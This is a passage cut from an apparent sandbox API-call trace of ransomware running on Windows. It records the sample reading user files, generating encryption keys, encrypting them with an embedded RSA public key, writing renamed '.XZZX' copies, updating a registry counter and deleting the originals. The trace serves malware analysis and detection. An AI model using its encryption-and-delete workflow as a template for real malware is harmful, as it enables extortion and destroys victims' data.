lpString1="63AB35AD17277526536F22E31B54596E.XZZX") returned="63AB35AD17277526536F22E31B54596E.XZZX" [0162.746] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0162.746] SetErrorMode (uMode=0x1) returned 0x1 [0162.746] lstrcpyW (in: lpString1=0x29af860, lpString2="63AB35AD17277526536F22E31B54596E.XZZX" | out: lpString1="63AB35AD17277526536F22E31B54596E.XZZX") returned="63AB35AD17277526536F22E31B54596E.XZZX" [0162.746] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x3853a6eb, Data2=0x1e0, Data3=0x4ada, Data4=([0]=0xa1, [1]=0xe8, [2]=0x7e, [3]=0x75, [4]=0xba, [5]=0x40, [6]=0x18, [7]=0x54))) returned 0x0 [0162.746] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\63AB35AD17277526536F22E31B54596E.XZZX") returned 80 [0162.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0162.746] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\9CD8F8A0008C58C03853A6EB03273D08.XZZX") returned 80 [0162.746] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 544 os_tid = 0xbec [0162.902] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0162.902] lstrcpyW (in: lpString1=0x29af460, lpString2="8C424C551A76D4366F1622171E8EB87E.XZZX" | out: lpString1="8C424C551A76D4366F1622171E8EB87E.XZZX") returned="8C424C551A76D4366F1622171E8EB87E.XZZX" [0162.902] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0162.902] SetErrorMode (uMode=0x1) returned 0x1 [0162.902] lstrcpyW (in: lpString1=0x29af860, lpString2="8C424C551A76D4366F1622171E8EB87E.XZZX" | out: lpString1="8C424C551A76D4366F1622171E8EB87E.XZZX") returned="8C424C551A76D4366F1622171E8EB87E.XZZX" [0162.902] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xe2fa8dbc, Data2=0xe743, Data3=0x42ed, Data4=([0]=0xa2, [1]=0x55, [2]=0x48, [3]=0x82, [4]=0x5d, [5]=0xfc, [6]=0xe9, [7]=0x9))) returned 0x0 [0162.902] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\8C424C551A76D4366F1622171E8EB87E.XZZX") returned 80 [0162.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0162.902] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\7D77BC343C755F07E2FA8DBC3F10434F.XZZX") returned 80 [0162.902] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 545 os_tid = 0xbf0 [0163.058] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0163.058] lstrcpyW (in: lpString1=0x29af460, lpString2="8DFF43342C68841C83BDE75D30616864.XZZX" | out: lpString1="8DFF43342C68841C83BDE75D30616864.XZZX") returned="8DFF43342C68841C83BDE75D30616864.XZZX" [0163.058] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0163.058] SetErrorMode (uMode=0x1) returned 0x1 [0163.058] lstrcpyW (in: lpString1=0x29af860, lpString2="8DFF43342C68841C83BDE75D30616864.XZZX" | out: lpString1="8DFF43342C68841C83BDE75D30616864.XZZX") returned="8DFF43342C68841C83BDE75D30616864.XZZX" [0163.058] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x7bd7fd66, Data2=0x8277, Data3=0x4f84, Data4=([0]=0x88, [1]=0x7a, [2]=0x21, [3]=0x44, [4]=0x27, [5]=0xe4, [6]=0xf4, [7]=0xce))) returned 0x0 [0163.058] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\8DFF43342C68841C83BDE75D30616864.XZZX") returned 80 [0163.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0163.058] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\4014966A2885FE5C7BD7FD662B20E2A4.XZZX") returned 80 [0163.058] StrStrW (lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 546 os_tid = 0xbf4 [0163.214] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0163.214] lstrcpyW (in: lpString1=0x29af460, lpString2="FD82D02831F226B04645120F361F0AF8.XZZX" | out: lpString1="FD82D02831F226B04645120F361F0AF8.XZZX") returned="FD82D02831F226B04645120F361F0AF8.XZZX" [0163.214] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0163.214] SetErrorMode (uMode=0x1) returned 0x1 [0163.214] lstrcpyW (in: lpString1=0x29af860, lpString2="FD82D02831F226B04645120F361F0AF8.XZZX" | out: lpString1="FD82D02831F226B04645120F361F0AF8.XZZX") returned="FD82D02831F226B04645120F361F0AF8.XZZX" [0163.214] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x85ec8ec7, Data2=0x6a6d, Data3=0x4825, Data4=([0]=0x97, [1]=0x13, [2]=0xd5, [3]=0x34, [4]=0x9a, [5]=0xaf, [6]=0xd2, [7]=0xe3))) returned 0x0 [0163.214] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\FD82D02831F226B04645120F361F0AF8.XZZX") returned 80 [0163.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0163.214] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\F8D730BB1DFE09C185EC8EC72098EE09.XZZX") returned 80 [0163.214] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 547 os_tid = 0xbf8 [0163.376] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0163.376] lstrcpyW (in: lpString1=0x29af460, lpString2="3wes.gif" | out: lpString1="3wes.gif") returned="3wes.gif" [0163.376] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0163.376] SetErrorMode (uMode=0x1) returned 0x1 [0163.376] lstrcpyW (in: lpString1=0x29af860, lpString2="3wes.gif" | out: lpString1="3wes.gif") returned="3wes.gif" [0163.376] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x48854b1c, Data2=0xa787, Data3=0x4e8a, Data4=([0]=0x89, [1]=0x83, [2]=0x80, [3]=0x93, [4]=0xf3, [5]=0x7f, [6]=0x3a, [7]=0xc3))) returned 0x0 [0163.376] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3wes.gif") returned 50 [0163.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0163.376] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3249DFC4336570C648854B1C3600550E.XZZX") returned 79 [0163.376] StrStrW (lpFirst="3wes.gif", lpSrch="XZZX") returned 0x0 [0163.376] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3wes.gif", dwFileAttributes=0x20) returned 1 [0163.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3wes.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3wes.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0163.377] ReadFile (in: hFile=0x184, lpBuffer=0x43a0bd8, nNumberOfBytesToRead=0x11f25, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43a0bd8*, lpNumberOfBytesRead=0x29ae418*=0x11f25, lpOverlapped=0x0) returned 1 [0163.378] CloseHandle (hObject=0x184) returned 1 [0163.378] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0163.378] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0163.379] SetErrorMode (uMode=0x1) returned 0x1 [0163.379] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0163.379] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc1430) returned 1 [0163.382] CryptGenKey (in: hProv=0x3cc1430, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372478) returned 1 [0163.754] CryptExportKey (in: hKey=0x4372478, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0163.754] CryptExportKey (in: hKey=0x4372478, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0163.754] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0163.754] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0163.754] CryptDestroyKey (hKey=0x4372478) returned 1 [0163.754] CryptReleaseContext (hProv=0x3cc14b8, dwFlags=0x0) returned 0 [0163.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3249DFC4336570C648854B1C3600550E.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3249dfc4336570c648854b1c3600550e.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0163.755] WriteFile (in: hFile=0x208, lpBuffer=0x43a0bd8*, nNumberOfBytesToWrite=0x11f25, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a0bd8*, lpNumberOfBytesWritten=0x29ae438*=0x11f25, lpOverlapped=0x0) returned 1 [0163.756] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11f25 [0163.756] WriteFile (in: hFile=0x208, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0163.756] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11f2a [0163.756] WriteFile (in: hFile=0x208, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x10, lpOverlapped=0x0) returned 1 [0163.756] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11f3a [0163.756] WriteFile (in: hFile=0x208, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0163.756] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11f3f [0163.756] SetErrorMode (uMode=0x1) returned 0x1 [0163.756] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0163.756] OutputDebugStringW (lpOutputString="end") [0163.757] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v¨\x8eÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0163.757] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0163.757] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x3cc15c8) returned 1 [0163.757] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc15c8, dwCertEncodingType=0x1, pInfo=0x437e388*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437e3b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437e3c0*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372478) returned 1 [0163.757] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0163.758] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0163.758] CryptEncrypt (in: hKey=0x4372478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0163.758] CryptEncrypt (in: hKey=0x4372478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc1650*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc1650*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0163.758] WriteFile (in: hFile=0x208, lpBuffer=0x3cc1650*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc1650*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0163.758] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0163.758] WriteFile (in: hFile=0x208, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0163.758] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0163.758] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0163.758] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x1ac) returned 0x0 [0163.758] RegQueryValueExW (in: hKey=0x1ac, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xde, lpcbData=0x29adfdc*=0x4) returned 0x0 [0163.758] RegCloseKey (hKey=0x1ac) returned 0x0 [0163.758] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x1ac) returned 0x0 [0163.758] RegSetValueExW (in: hKey=0x1ac, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xdf, cbData=0x4 | out: lpData=0x29adfec*=0xdf) returned 0x0 [0163.758] RegCloseKey (hKey=0x1ac) returned 0x0 [0163.758] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0163.759] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0163.759] CloseHandle (hObject=0x208) returned 1 [0163.759] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0163.759] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0163.759] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3wes.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3wes.gif")) returned 1 [0163.793] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3wes.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3wes.gif")) returned 0 Thread: id = 548 os_tid = 0xbfc [0163.587] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0163.587] lstrcpyW (in: lpString1=0x2aaf460, lpString2="cjwLkHotFDrB.csv" | out: lpString1="cjwLkHotFDrB.csv") returned="cjwLkHotFDrB.csv" [0163.587] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0163.587] SetErrorMode (uMode=0x1) returned 0x1 [0163.587] lstrcpyW (in: lpString1=0x2aaf860, lpString2="cjwLkHotFDrB.csv" | out: lpString1="cjwLkHotFDrB.csv") returned="cjwLkHotFDrB.csv" [0163.587] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xaecc4481, Data2=0xa049, Data3=0x4f49, Data4=([0]=0xa0, [1]=0x78, [2]=0xcc, [3]=0x15, 